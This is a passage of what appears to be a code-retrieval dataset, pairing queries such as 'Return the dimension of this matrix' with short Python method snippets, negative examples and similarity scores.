_FindHull(s1, p, c, hull_points)\n _FindHull(s2, c, q, hull_points)", "def __str__(self):\n s = ''\n for vertex in self.vertices:\n s += vertex.__str__()\n s += \"\\n\"\n return s", "def __str__(self):\n\t\treturn \"Triangle's sides: a = {}, b = {}, c = {}\".format(self.a, self.b, self.c)" ]
[ "0.66425604", "0.63532376", "0.6281747", "0.60994506", "0.60871357", "0.5944821", "0.5937618", "0.5842721", "0.5841963", "0.5745582", "0.57072836", "0.5683671", "0.5624012", "0.5577006", "0.55180144", "0.54937017", "0.5490255", "0.5487594", "0.54810053", "0.5431776", "0.5420677", "0.5419913", "0.54195774", "0.54107594", "0.53963655", "0.5381174", "0.5371979", "0.5314691", "0.530822", "0.52644336", "0.5242529", "0.52290845", "0.5220777", "0.52122915", "0.5207063", "0.51987255", "0.51907456", "0.518947", "0.51873845", "0.5183911", "0.5182662", "0.51581913", "0.5151492", "0.5150237", "0.51456785", "0.51367974", "0.5129904", "0.51298225", "0.5126742", "0.51249313", "0.5115022", "0.5113653", "0.5113026", "0.51114845", "0.5110803", "0.5108071", "0.51045597", "0.5080294", "0.50765896", "0.5075157", "0.5067536", "0.5066869", "0.50636435", "0.505019", "0.50388986", "0.5033782", "0.5032251", "0.5028292", "0.5022239", "0.50192374", "0.5007877", "0.49961972", "0.49892825", "0.4970937", "0.49567795", "0.49531296", "0.4952428", "0.49523526", "0.4950328", "0.49483976", "0.4944735", "0.49410874", "0.49403048", "0.49345824", "0.49335748", "0.4933514", "0.4932789", "0.49310324", "0.49185538", "0.49185538", "0.49133837", "0.49021992", "0.48980108", "0.48966348", "0.4896365", "0.48920193", "0.48897263", "0.48837963", "0.4882637", "0.48821265" ]
0.75023854
0
r""" Return the dimension of this matrix.
def dim(self):
    return self._d
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def dimension(self):\n return self.__N", "def get_num_dimensions(self):\n dimensions = self.data.shape\n return dimensions[1]", "def dim(self):\n return len(self.shape)", "def dim(self):\n return len(self.shape)", "def dimensionality(self):\n return int(self.nDims)", "def dim(self) -> int:\n return self._n_dim", "def n_dim(self):\n return self._n_dim", "def dimension(self):\n return self._dim", "def dimension_size(self):\n return self._dim", "def get_dimension_number(self) -> int:\n return np.squeeze(self._channel_arrays[0]).ndim", "def num_dim(self):\n return len(self._dimensions)", "def num_dim(self):\n return len(self._dimensions)", "def dim(self):\n return self.__dim__", "def dim(self):\n if '_dim' in self.__dict__:\n return self._dim\n\n if len(self._Vrepresentation)==0:\n self._dim = -1\n return self._dim\n\n origin = vector(self._Vrepresentation[0])\n v_list = [ vector(v)-origin for v in self._Vrepresentation ]\n self._dim = matrix(v_list).rank()\n return self._dim", "def dim(self):\n return len(self._n)", "def get_dim(self):\n return self._dim", "def dim(self) -> int:\n return self.atoms.shape[:-1]", "def get_dimension(self) -> int:\n return self.embedder.get_dimension()", "def get_dim(self):\n return self.dim", "def dim(self):\n return self._dim", "def dimension_count(self):\n return self._dimensionCount", "def get_dimension_length(self):\n pass", "def get_in_dim(self) -> int:\n return self.in_dim", "def dimension(self):\n return 3*self.genus - 3 + self.n", "def dimensionality(self):\n if self.vector.shape is ():\n return 0\n if len(self.vector.shape) is 1:\n return 1\n _, dim = self.vector.shape\n return dim", "def size(self)->int:\n\n return np.prod([axes if is_integer(axes) else len(axes) for axes in self._dim_axes])", "def width(self) -> int:\n return self._obj[self.x_dim].size", "def dimension(self):\n\t\treturn self.d", "def ndim(self):\n return len(self.shape)", "def ndim(self):\n return len(self.shape)", "def ndim(self):\n return len(self.shape)", "def ndim(self):\n return len(self.shape)", "def ndim(self):\n return len(self.shape)", "def ndim(self):\n return len(self.shape)", "def size(self):\n\t\treturn self.dims", "def ndim(self):\n return self.__value.ndim", "def ndim(self) -> int:\n return self[0].ndim", "def _get_observation_dimension(self):\n return len(self._get_observation_np())", "def getDimension(self):\n dim = len(self.__axis_labels__)\n if dim == 0:\n # Labels weren't set, so how about the data\n dim = self[0].dim()\n return dim", "def ndim(self):\n return self._ndim", "def dim(self):\n return self.m, self.n", "def __len__(self) -> int:\n\n return self.shape.shape[1]", "def dimension(self):\n return self._dimension", "def dimension(self):\n return self._dimension", "def dimension(self):\n return self._dimension", "def dimension(self):\n return self._dimension", "def size(self):\n return int(misc.intprod(self.shape))", "def dim(self):\n\t\treturn self.D", "def dim(self) -> int:\n pass", "def n_dims(self):\n return len(self.dimensions)", "def ndim(self):\n if self._ndim is None:\n self._ndim = self.get_mesh_dimension()\n\n return self._ndim", "def ndim(self):\n # type: () -> int\n return len(self.shape)", "def ndim(self):\n return len(self._shape)", "def dim(self,mat):\n result = np.shape(mat)\n self.dimensions = result\n return self.dimensions", "def __len__(self):\n return self.N.shape[0]", "def dimension(self) -> float:\n return self._dimensions", "def dimension(self):\n return np.prod(np.asarray(self.subsystem_dims))", "def getdim(self):\n return 
round(self.w() / self.c)", "def width(self):\n return self.board.shape[1]", "def ndim(self):\n return self.data.ndim", "def dim(self) -> int:", "def get_ndim(self):\n return self.ndim", "def get_dims(self):\n row_lbl, col_lbl = self.get_idxvals()\n return len(row_lbl), len(col_lbl)", "def getDimension(self):\n return len(self.components)", "def size(self) -> int:\n return int(np.multiply(*self.shape))", "def dimension(self) -> int:\n return self.options.dimension", "def __len__(self):\n # type: () -> int\n return self.shape[0]", "def getNumDimensions(self):\n return len(self.di.keys())", "def __len__(self):\n return self.n_node.shape[0]", "def ndim(self):\n return self.X.ndim", "def ndim(self):\n\n self._check_assigned()\n\n if (\n self.lazy\n and self.transformer is not None\n and hasattr(self.transformer, \"get_transformed_shape\")\n ):\n return len(self.transformer.get_transformed_shape(self.values))\n else:\n return self.__array__().ndim", "def dim(self) -> tuple:\n if self.has_tensor(): return self.as_tensor().dim()\n else:\n return tuple(list(self[0].dim()[0]) + [len(self)]), self[0].dim()[1]", "def n_dims(self):\n return self.pdm.n_dims", "def get_ncols(self):\n return self.ncols", "def get_ncols(self):\n return self.ncols", "def dimension(self):\n return len(self.qubit_values)", "def size(self):\n if type(self._shape).__name__ == 'tuple':\n return self._shape[-1]\n else:\n return self._shape", "def getlen(self):\n if self.onlydiag():\n return self.lendiag()\n else:\n return len(self)", "def getDim(self):\n return \"%dx%d\" % (self.rows, self.cols)", "def dim(self):\n if self._classifier is None:\n with self:\n return self._classifier.features_dim\n\n return self._classifier.features_dim", "def dimension(self):\r\n a = 0\r\n for x in self.faces():\r\n if (len(x) > a):\r\n a = len(x) \r\n return a-1", "def get_size(self):\n # return the size along the index dimension\n size = 0\n if self._data is not None:\n size = shape(self._data)[self.index_dimension]\n\n return size", "def get_size(self):\n return self.get_params().shape[0]", "def get_width(self):\n width = np.size(self.img, 0)\n return width", "def dims(self):\n return self[0].dims", "def ndim(self):\n return np.ndim(self.MJD)", "def get_data_dim(self):\n return self.data_dim", "def __len__(self):\n ret = self.data.shape[0]\n return ret", "def ndim(self) -> int:\n\n return 1 + len(self.shape)", "def get_dimensionality(self) -> int:\n return self.dimensionality", "def ndim(self):\n return self.initial_value.ndim", "def num_cols(self):\n return (len(self.rows[0]))", "def get_dimension_width(self):\n pass", "def num_cols(self):\n return len(self.rows[0])", "def xdim(self):\n return len(self._x)", "def ndim(self):\n return len(self.nvars)", "def size(self):\n return numpy.prod(self.shape)", "def size(self):\n return self.__row_count * self.__col_count", "def __len__(self):\n return self.flatten_dim(self.shape[0])", "def num_dims(self):\n return self.h5['{}/{}'.format(SETTINGS, N_DIMS_STR)][()]" ]
[ "0.84898525", "0.84692967", "0.83745944", "0.83745944", "0.8322008", "0.8309151", "0.8180309", "0.81371695", "0.8114333", "0.8109193", "0.8031762", "0.8031762", "0.8015657", "0.7960735", "0.7944764", "0.7926571", "0.79092103", "0.78969157", "0.787916", "0.78600526", "0.77845377", "0.7781574", "0.7778791", "0.77745813", "0.77599967", "0.7751557", "0.7744779", "0.7742446", "0.77330893", "0.77330893", "0.77330893", "0.77330893", "0.77330893", "0.77330893", "0.7731611", "0.7727149", "0.77266836", "0.7701998", "0.76977724", "0.7696135", "0.76950914", "0.76935756", "0.76935065", "0.76935065", "0.76935065", "0.76935065", "0.7692694", "0.7685191", "0.7676192", "0.76736253", "0.7658482", "0.76359004", "0.762045", "0.7610858", "0.7610824", "0.75945246", "0.7576626", "0.75693196", "0.7557148", "0.7542722", "0.7534768", "0.75231385", "0.75181526", "0.75095457", "0.7506465", "0.74899155", "0.7478707", "0.74746126", "0.74731606", "0.74675727", "0.7453274", "0.7452009", "0.7446748", "0.74396485", "0.74396485", "0.7427004", "0.7420446", "0.74112725", "0.74075073", "0.7403833", "0.7398055", "0.7386803", "0.737916", "0.7377042", "0.73727417", "0.7371488", "0.73589927", "0.7350143", "0.73486733", "0.73446333", "0.7335781", "0.73234046", "0.7322276", "0.7317851", "0.7316576", "0.7315838", "0.7313707", "0.73112106", "0.72944826", "0.72916675" ]
0.7624366
52
r""" Return the number of variables used in this matrix.
def num_vars(self):
    return self._nvars
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_num_variables(self):\n return len(self.variables)", "def num_vars(self):\n return self.nvars", "def nvar(self):\n return len(self.__vars)", "def GetNumberOfVariables(self):\n\n # nvar = 0\n # for i in self.variables_order:\n # # DO NOT COUNT VARIABLES THAT GET CONDENSED OUT\n # if i!=0:\n # if mesh.element_type == \"tri\":\n # nvar += (i+1)*(i+2) // 2\n # elif mesh.element_type == \"tet\":\n # nvar += (i+1)*(i+2)*(i+3) // 6\n # elif mesh.element_type == \"quad\":\n # nvar += (i+1)**2\n # elif mesh.element_type == \"hex\":\n # nvar += (i+1)**3\n\n # nvar = sum(self.variables_order)\n if self.nvar == None:\n self.nvar = self.ndim\n return self.nvar", "def nVariables(self):\n return len(self.variables)", "def countVars(self):\n return len(self.initializedVars[\"GF\"]) + len(self.initializedVars[\"LF\"]) + len(self.initializedVars[\"TF\"])", "def num_vars(self):\n return len(self.bounds.lb)", "def variables_num(self):\n return 1", "def n_variables(self):\n return sum([p.n_variables for p in self.parameters])", "def __len__(self) -> int:\n return len(self.variables)", "def count_vars(scope=''):\n v = get_vars(scope)\n return sum([np.prod(var.shape.as_list()) for var in v])", "def variables_used (self) :\r\n\t\t## These names possibly contain dimension specification!\r\n\t\treturn self.variable_names", "def _getNumVariables(self, graph_def):\n return sum(node.op == \"ReadVariableOp\" for node in graph_def.node)", "def ndim(self):\n return len(self.nvars)", "def number_of_variables(dataset, name_of_variable):\r\n first_row = dataset[0].keys()\r\n num = 0\r\n for variable in first_row:\r\n if name_of_variable in variable:\r\n num += 1 \r\n return num", "def nvar(self):\n return self.h.shape[0]", "def nvar(self):\n return len(self.v)", "def num_cols(self):\n return len(self.column_names())", "def __checkNrVars(self):\n variables = set()\n for q in self.__quantifierList:\n for var in q.getVariableNames():\n variables.add(\"%s\" % var)\n for c in self.__clauseList:\n for var in c.getVariableNames():\n variables.add(\"%s\" % var)\n \n return len(variables)", "def GetNumberCols(self):\n return len(self.__colsKey)", "def numpoints(self):\n return len(self.pars) + 1 # so dof is 1", "def num_dof(self) -> int:\n return len(self)", "def dim(self):\n return self.ambient_dim() - self.n_equations()", "def ndims(self, varname):\n if self.handle == None: return None\n try:\n var = self.handle.variables[varname]\n except KeyError:\n return None\n return len(var.dimensions)", "def columns_count(self):\n if self.value.count != 0:\n return len(self.value[0])\n else:\n return 0", "def count_params():\n param_count = np.sum([np.prod(x.get_shape().as_list()) for x in tf.global_variables()])\n return param_count", "def __len__(self):\n return len(self._varvals)", "def get_num_cols(self):\n return self._num_cols", "def get_num_dimensions(self):\n dimensions = self.data.shape\n return dimensions[1]", "def _get_observation_dimension(self):\n return len(self._get_observation_np())", "def calculate_num_params(self):\n num_params = 0\n for p in self.parameters():\n num_params += p.data.view(-1).size(0)\n return num_params", "def getNbColumns(self):\n return self.data.shape[0]", "def getNumDimensions(self):\n return len(self.di.keys())", "def get_num_features(self):\r\n \r\n return len(self[0]['x'])", "def num_params():\n total_num = 0\n for var in tf.trainable_variables():\n shape = var.get_shape()\n total_num += functools.reduce(operator.mul, [dim.value for dim in shape], 1)\n return total_num", "def __len__(self) 
-> int:\n\n return self.layout.gaDims", "def dim(self):\n return len(self._n)", "def getNumCols(self):\n return self.__cols", "def ncolumns(self):\n return self.__ncols", "def GetNumColumns(self):\n return len(self.columns)", "def n_items(self) -> int:\n return len(self._data_vars)", "def num_small_vars(self):\n return sum(\n case.num_small_vars for case in self.case_set.all() if case.num_small_vars is not None\n )", "def getNumGrids(self):\n c = list(self.gridVars.keys())\n return len(list(self.gridVars[c[0]].values()))", "def get_dof(self):\n return len(self.a_n)", "def num_cols(self):\n return len(self.rows[0])", "def n_thres(self):\n return np.size(self.thres)", "def getNoOfCols(self):\n return _patchExtractor.patchExtractor_getNoOfCols(self)", "def num_cols(self):\n return (len(self.rows[0]))", "def num_parameters(self) -> int:\n return len(self.w) + prod(self.v.shape) - len(self.v)", "def get_location_count(self):\n return len(self.matrix)", "def dimensions(self):\n return len(self.parameter_names)", "def numdofs(self):\n return self.kv.size - self.p - 1", "def size_of_variable(self, variable):\n index_structures = variable.index_structures\n if not index_structures:\n return 1\n mapping = [self.mod_index[ind].mapping for ind in index_structures]\n blocking = [self.mod_index[ind].blocking for ind in index_structures]\n size = []\n for i in range(len(mapping)):\n if mapping[i] and blocking[i]:\n length = 0\n for blk in blocking[i]:\n if blk == 0:\n length += 1\n else:\n length += blk\n size.append(length)\n else:\n return None\n return size", "def numel(self):\n return self.t.size", "def voxel_count(self):\n return self.cols * self.rows * self.sections", "def dims(self):\n return self.v.dims() # TODO: check (empty? etc)\n #return self.t.shape # TODO: check (empty? etc)\n # TODO: convert to tuple? 
here / in varset?", "def size(self, varname):\n if self.handle == None: return []\n try:\n var = self.handle.variables[varname]\n except KeyError:\n return []\n \n def dimlen(d):\n dim = self.handle.dimensions[d]\n if dim != None:\n t = type(dim).__name__\n if t == 'int':\n return dim\n return len(dim)\n return 0\n return map(lambda d: dimlen(d), var.dimensions)", "def numel(self) -> int:\n return sum(p.numel() for p in self.parameters)", "def num_dim(self):\n return len(self._dimensions)", "def num_dim(self):\n return len(self._dimensions)", "def GetGlobalNumCols(self):\n return _hypre.HypreParMatrix_GetGlobalNumCols(self)", "def ncolumns(self):\n return len(self.__column_list)", "def GetNumCols(self):\n return _hypre.HypreParMatrix_GetNumCols(self)", "def dim(self):\n if '_dim' in self.__dict__:\n return self._dim\n\n if len(self._Vrepresentation)==0:\n self._dim = -1\n return self._dim\n\n origin = vector(self._Vrepresentation[0])\n v_list = [ vector(v)-origin for v in self._Vrepresentation ]\n self._dim = matrix(v_list).rank()\n return self._dim", "def variables_used (self) :\r\n\t\treturn []", "def next_variable(self):\n\n self.nvars += 1\n return self.nvars", "def __len__(self):\n return np.size(self.A,0)", "def n_cols(self):\n\n return len(self.plaincolumns)", "def dimension_count(self):\n return self._dimensionCount", "def num_cells_global(self):\n return self.get_dim_attribute('num_cells')", "def get_number_of_dofs(self) -> int:\n\n return len(self.nodes) * Node.number_of_dofs", "def size(self, level=None):\n level = level or self.local_variables\n names = {}\n while level:\n for name in level.bindings:\n names[name] = 1\n level = level.parent\n return len(names)", "def getNumElements(self):\n return 1 + sum(m.getNumElements() for m in self.members)", "def dim(self) -> int:\n return self._n_dim", "def dim(self) -> int:\n return self.atoms.shape[:-1]", "def count_parameters(self):\n return sum(p.numel() for p in self.parameters() if p.requires_grad)/1e6", "def count_parameters(self):\n return sum(p.numel() for p in self.parameters() if p.requires_grad)/1e6", "def dim(self):\n if self._classifier is None:\n with self:\n return self._classifier.features_dim\n\n return self._classifier.features_dim", "def __len__(self):\n return self.dbms.get_nb_fields(self.table, self.db)", "def number_of_columns(self):\n return len(self._columns)", "def n_cf(self):\n return np.size(self._ref_ii, 0)", "def count_params(model):\n total = 0\n for x in model.trainable_variables:\n total += np.prod(x.shape)\n return total", "def nfactors(self):\n return self.L.nnz", "def count_dims(da):\n return len(da.dims)", "def num_dof(self) -> int:\n return self._num_dof", "def N(self):\n return self.get_dof()", "def columns(self) -> int:\n return self.__squares[0].__len__()", "def column_count(self):\n return self.column_length", "def columnCount( self ):\n if not self.o_data is None:\n if self.isItemMultiDimensional():\n return len(self.o_data)\n else:\n return 1\n else:\n return 1", "def _N(self):\n return len(self._array)", "def getNumBvars(self):\n return _libsbml.ASTNode_getNumBvars(self)", "def size(self):\n return self.__row_count * self.__col_count", "def dimension(self):\n return self.__N", "def get_size(self):\n lines = len(self.coefficients)\n columns = 0 if lines == 0 else len(self.coefficients[0])\n return lines, columns", "def get_number_of_atoms_to_optimize(self):\n v = self.c.get(simulation_cell=True)\n return len(v.data.stoichiometry)", "def col_count(self):\n if isinstance(self.data, pd.DataFrame) 
is False:\n return None\n else:\n return self.data.shape[1]", "def num_nodes(self):\n return ((len(self.tensor_u)+1) * (len(self.tensor_v)+1) *\n (len(self.tensor_w)+1))", "def col_count(self):\n return self.__col_count", "def count(self):\r\n return self.data_array.size", "def n_dim(self):\n return self._n_dim" ]
[ "0.826646", "0.80817354", "0.79613394", "0.7953327", "0.79433763", "0.7778536", "0.7749949", "0.75871086", "0.74991745", "0.74765337", "0.74339026", "0.72988725", "0.71537995", "0.71156085", "0.7080469", "0.69808406", "0.691234", "0.67460585", "0.6729376", "0.6723816", "0.6715447", "0.6695859", "0.66817945", "0.6674521", "0.66462207", "0.66337615", "0.6630602", "0.6628727", "0.6617903", "0.6597347", "0.65870893", "0.6580963", "0.6578233", "0.6574441", "0.6557713", "0.6536364", "0.6519671", "0.65078735", "0.6497983", "0.6497858", "0.6496423", "0.64925754", "0.64911383", "0.6488006", "0.6474853", "0.64673465", "0.6466444", "0.64625627", "0.6450822", "0.6450215", "0.64452225", "0.6442914", "0.6439309", "0.64381504", "0.6437481", "0.6434369", "0.643062", "0.64295954", "0.6418409", "0.6418409", "0.64174145", "0.64139867", "0.63977045", "0.6395228", "0.6390997", "0.63760775", "0.63718116", "0.63648176", "0.6358056", "0.635411", "0.6352261", "0.6330479", "0.6330457", "0.63292223", "0.6317109", "0.6309389", "0.6309389", "0.6302493", "0.63020617", "0.6301152", "0.6300458", "0.62988526", "0.62936676", "0.6292335", "0.6289663", "0.62854064", "0.6282889", "0.62814915", "0.6281423", "0.62775314", "0.6277122", "0.62750447", "0.6268813", "0.62649155", "0.6264652", "0.6257723", "0.6256259", "0.6250056", "0.6246107", "0.62442696" ]
0.8000086
2
r""" To obtain an item of the matrix
def __getitem__(self, data):
    i, j = data
    return self._data[i][j]
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def __getitem__(self, item):\n if type(item) is int:\n # select row by default\n if self.shape[0] == 1: # iterate by column if it's a row vector\n return self.values[0][item]\n elif self.shape[1] == 1: # iterate by row if it's a column vector\n return self.values[item][0]\n return Matrix([self.values[item]])\n elif type(item) is list:\n return Matrix([self.values[i] for i in item])\n elif type(item) is tuple and len(item) == 2 and type(item[0]) is int and type(item[1]) is int:\n r, c = item\n return self.values[r][c]\n elif type(item) is slice:\n return Matrix(self.values[item])\n else:\n for i in item:\n if type(i) not in (int, slice):\n raise ValueError(f\"Bad index type {type(i)}\")\n if len(item) != 2:\n raise ValueError(f\"Don't understand index: {item}\")\n if self.shape == (0, 0):\n return Matrix([[]])\n row_slice, col_slice = item\n rows = self.values[row_slice] # M[0, :] to work\n if type(rows[0]) is not list:\n rows = [rows]\n subset = [row[col_slice] for row in rows]\n if type(subset) in (int, float, complex):\n return Matrix([[subset]])\n elif type(subset) in (list, tuple) and type(subset[0]) in (int, float, complex):\n return Matrix([subset])\n else:\n return Matrix(subset)", "def getitem(self, i, j):\n # XXX: flint matrices do not support negative indices\n # XXX: They also raise ValueError instead of IndexError\n m, n = self.shape\n if i < 0:\n i += m\n if j < 0:\n j += n\n try:\n return self.rep[i, j]\n except ValueError:\n raise IndexError(f\"Invalid indices ({i}, {j}) for Matrix of shape {self.shape}\")", "def get_element(self,mat,row,column):\n result = mat[row-1][column-1]\n self.element = result\n return self.element", "def __getitem__(self, item):\n return self.row[item]", "def __getitem__(self, item):\n return self.cube[item]", "def _getMatrixRow(self):\n item = self._item()\n if item is not None:\n matrix = item.getMatrix()\n return qt.QVector3D(*matrix[self._index, :])\n else:\n return None", "def getItem(self, i, j):\n if i < 0:\n raise IndexError('Row index must be nonnegative.')\n if j < 0:\n raise IndexError('Column index must be nonnegative.')\n\n return self.__m[i - 1][j - 1]", "def __getitem__(self, key):\n # TODO: fix 1-by-1 case, deprecate support for vector indexing.\n # TODO: add isvector() method\n # TODO: add method that distinguishes between 1x1, 1xn, mx1, mxn\n # TODO: make sure that there's distinct ways to index a 1 by 1 matrix\n # and retrieve a value.\n rows, cols, is_view = self._cleankey(key)\n if not (is_view): #simple index case\n i, j = rows[0], cols[0]\n return self.data[i, j]\n return MPView(self, rows, cols)", "def retrievematrixelement(self, coord):\n currentelement = self.matrix\n for u in coord:\n currentelement = currentelement[u]\n\n return currentelement", "def get_row(A: Matrix, i: int) -> Vector:\n return A[i]", "def get_row(A: Matrix, i: int) -> Vector:\n return A[i]", "def get_row(A: Matrix, i: int) -> Vector:\n return A[i]", "def matGet(mat, r, c):\n return mat[r][c]", "def __getitem__(self, item):\n return self.elements[item]", "def __getitem__(self,key):\n if type(key) is tuple:\n return self.list[LTMatrix.getPosition(*key)]\n else:\n return self.list[key]", "def __getitem__(self, index):\n return (index, self.data_cube[0, index, :])", "def get_row(A: Matrix, i: int) -> Vector:\n return A[i] # A[i] is already the ith row", "def get_item(array, index):\n row, column = index\n return array[row][column]", "def __getitem__(self,pt):\n return self.maze[pt.y][pt.x]", "def __getitem__(self, item) -> SurveyRow:\n return 
self.rows[item]", "def row(self, index):\n return self.matrix_list[index - 1]", "def __getitem__ (self, idx):\n return self.row(idx[0])[idx[1]]", "def item(self):\n return np.array(self).item()", "def item(self, i, path=None):\n if path is None:\n assert list(self.sequences.keys())[0] is NoDim, \"Cannot access item without path if the array has more than one dimension.\"\n path = NoDim\n return self.sequences[path][i]", "def get(self,row,col):\r\n return self.puzzle[row][col]", "def test_get_indices_one_existing_item_scalar(self):\r\n item_to_find = 'PC.355'\r\n self.assertEqual(_get_indices(self.dist_matrix_header, item_to_find),\r\n [1])", "def __getitem__(self, item):\n index = self.reindex(item)\n return self.parent[index]", "def __getitem__(self, i):\n return self.__x[i]", "def __getitem__(self, key):\n x, y = key\n if y >= self.block_height:\n return False\n return self.matrix[y][x]", "def test_col_get_item():\n pm1 = magpy.magnet.Cuboid((1, 2, 3), (1, 2, 3))\n pm2 = magpy.magnet.Cuboid((1, 2, 3), (1, 2, 3))\n pm3 = magpy.magnet.Cuboid((1, 2, 3), (1, 2, 3))\n\n col = magpy.Collection(pm1, pm2, pm3)\n assert col[1] == pm2, \"get_item failed\"\n assert len(col) == 3, \"__len__ failed\"", "def __getitem__(self, i):\n return self._ar[i]", "def __getitem__(self, idx):\n if len(idx) == 1:\n return self.rows[idx[0]]\n else:\n return self.rows[idx[0]][idx[1]]", "def row (self, i):\n return Vector(self._m[i])", "def __getitem__(self, item):\n try:\n return self._values[item]\n except KeyError:\n raise FactInvalidIndex(str(item))", "def __getitem__(self, item):\r\n\r\n return self.data.__getitem__(item)", "def __pos__(self):\r\n return mat4(map(lambda x: +x, self.mlist))", "def __getitem__(self,idx):\n return self.g[idx]", "def __getitem__(self, item):\n return self.data[item]", "def __getitem__(self, item):\n return self.data[item]", "def __getitem__(self, item):\n return self.data[item]", "def __getitem__(self, index):\n if not (type(index) in MATRIX_VALID_INTS):\n return NotImplemented\n return self._value[index]", "def getItem(self,row,column,default=None):\n data = self.data\n if row in data and column in data[row]:\n return data[row][column]\n else:\n return default", "def getByLable(self, a, b):\n\t\treturn self.matrix[self.access[a]][self.access[b]]", "def get_item(x, is_cuda):\r\n if is_cuda:\r\n x = x.cpu().detach().numpy()\r\n else:\r\n x = x.detach().numpy()\r\n return x", "def __getitem__(self, item):\n return self.top[item]", "def __getitem__(self, item):\n return self._data[item]", "def __getitem__(self, item):\n u, v = item\n return self.__getitem(u, v)", "def __getitem__(self, index):\n x, y = index\n if 0 <= x < self.width and 0 <= y < self.height:\n return self.cells[x + y * self.width]\n else:\n return None", "def __getitem__(self, idx):\n return self.getitem(idx)", "def __getitem__(self, i):\n mondict = self.load_seq(i)\n N_max = mondict['xs'].shape[0]\n u = mondict['us']\n x = mondict['xs']\n return u, x", "def __getitem__(self, item):\r\n return item.get_value(borrow=True)", "def __getitem__(self, i_j):\n\t\t\n\t\ttry:\n\t\t\tif i_j != Ellipsis:\n\t\t\t\treturn self.item_cache[i_j]\n\t\texcept TypeError:\n\t\t\t'''\n\t\t\tc_i_j = []\n\t\t\tfor n in (0, 1):\n\t\t\t\ttry:\n\t\t\t\t\tc_i_j.append((i_j[n].start, i_j[n].stop, i_j[n].step))\n\t\t\t\texcept AttributeError:\n\t\t\t\t\tc_i_j.append(i_j[n])\n\t\t\tc_i_j = tuple(c_i_j)\n\t\t\ttry:\n\t\t\t\treturn self.item_cache[c_i_j]\n\t\t\texcept KeyError:\n\t\t\t\tpass\n\t\t\t'''\n\t\t\tpass\n\t\t\tc_i_j = i_j\n\t\texcept 
(AttributeError, KeyError):\n\t\t\tc_i_j = i_j\n\t\t\n\t\tdef getitem(direction, indices_i, indices_j):\n\t\t\tif direction == self.__direction.scalar:\n\t\t\t\treturn self.value[self.row_dimension * indices_i + indices_j]\n\t\t\telif direction == self.__direction.row:\n\t\t\t\tj = indices_j\n\t\t\t\treturn self.algebra.vector_algebra(self.value[self.row_dimension * _i + j] for _i in indices_i)\n\t\t\telif direction == self.__direction.column:\n\t\t\t\ti = indices_i\n\t\t\t\treturn self.algebra.vector_algebra(self.value[self.row_dimension * i + _j] for _j in indices_j)\n\t\t\telif direction == self.__direction.matrix:\n\t\t\t\tselection = {}\n\t\t\t\tfor (m, i), (n, j) in zip(enumerate(indices_i), enumerate(indices_j)):\n\t\t\t\t\tselection[m, n] = i, j\n\t\t\t\treturn self.algebra((lambda _m, _n: self.value[self.row_dimension * selection[_m, _n][0] + selection[_m, _n][1]]), row_dimension=len(indices_i), column_dimension=len(indices_j))\n\t\t\telif direction == self.__direction.copy:\n\t\t\t\t#return self.algebra(self.value, row_dimension=self.row_dimension, column_dimension=self.column_dimension)\n\t\t\t\treturn self.algebra(self)\n\t\t\telse:\n\t\t\t\traise RuntimeError(\"Unknown direction value: `{}`\".format(repr(direction)))\n\t\t\n\t\tresult = self.__analyze_indices(i_j, getitem)\n\t\t\n\t\tif __debug__:\n\t\t\ttry:\n\t\t\t\tif i_j != Ellipsis:\n\t\t\t\t\tassert self.item_cache[c_i_j] == result, f\"{repr(c_i_j)}, {id(self)}\"\n\t\t\texcept (AttributeError, KeyError, TypeError):\n\t\t\t\tpass\n\t\t\n\t\ttry:\n\t\t\tif i_j != Ellipsis:\n\t\t\t\tself.item_cache[c_i_j] = result\n\t\texcept (AttributeError, TypeError):\n\t\t\tpass\n\t\t\n\t\treturn result", "def __getitem__(self, idx):\n return self.GetArray(idx)", "def __getitem__(self, idx):\n return self.GetArray(idx)", "def getItem(self, column, position):\n return self.data[column, position]", "def __getitem__(self, itm):\n return self.wrappers[itm]", "def __getitem__(self, item):\n return self.__dict__[item]", "def getrow(self, i):\n new = lil_matrix((1, self.shape[1]), dtype=self.dtype)\n new.rows[0] = self.rows[i][:]\n new.data[0] = self.data[i][:]\n return new", "def __getitem__(self, index):\n if isinstance(index, (tuple, list)) and len(index) == 2:\n return self.cells[index[1]][index[0]]\n return self.cells[index]", "def __getitem__(self, index):\n item = self.data[index]\n return item", "def __getitem__(self, k):\n return self._board[k]", "def __getitem__(self, inds):\n i, j = inds\n return self.array[i][j]", "def item(self) -> Tuple[Scalar, ...]:\n return self._psdf.head(2)._to_internal_pandas().index.item()", "def __getitem__(self, rc):\r\n row, col = rc\r\n index = self.row_column_to_index(row, col)\r\n return self.values[index]", "def __getitem__(self, index):\n return self.array[index]", "def __getitem__(self, item):", "def __getitem__(self, idx):\n return self.items[idx]", "def __getitem__(self, j):\n\t\treturn self._coords[j]", "def get_elem (A, i, j):\n\treturn A[j][i]", "def __call__(self, pos):\n return self.__getitem__(pos)", "def __call__(self, pos):\n return self.__getitem__(pos)", "def __getitem__(self,index):\n return self._data[index[0]][index[1]]", "def __getitem__(self,i):\n return self._items[i]", "def __getitem__(self, item) -> NumericalAttribute:\n return self._item_dict[item]", "def __getitem__(self, idx):\n return self.data.iloc[idx]", "def __getitem__(self, args):\n return self.tabel[args]", "def __getitem__(self, index):\n return self.dataset[index]", "def get_matrix(self):\n return self._matrix[:3, 
:]", "def __getitem__(self, index):\n return self.cellData[index]", "def get_item(self, items, y, x):\n if self.maze[y][x] != \" \" and self.maze[y][x] in items:\n return self.maze[y][x]\n else:\n return None", "def __getitem__(self, item) -> Union[MoleculeDatapoint, List[MoleculeDatapoint]]:\n return self.data[item]", "def __getitem__(self, node):\n\n return self.adj_list[node]", "def __getitem__(self, item):\r\n return self.select(item)", "def __getitem__ ( self , index ):\n\t\treturn self . data [ index ]", "def __getitem__(self, item):\n pass", "def __getitem__(self, item):\n pass", "def __getitem__(self, item):\n return self.default_dataset[item]", "def __getitem__(self, key):\n if self.expr_list: return self.expr_list[key]\n else:\n if key < 0: key += len(self)\n if self.expr_tensor is not None:\n return torch.index_select(self.expr_tensor, dim=1, index=torch.LongTensor([key]).to(xnmt.device)).squeeze(1)\n else:\n return torch.index_select(self.expr_transposed_tensor, dim=-1, index=torch.LongTensor([key]).to(xnmt.device)).squeeze(-1)", "def get_stain_matrix(I):", "def __getitem__(self, x):\n return self.data[self.name][x]", "def __getitem__(self, key):\n if 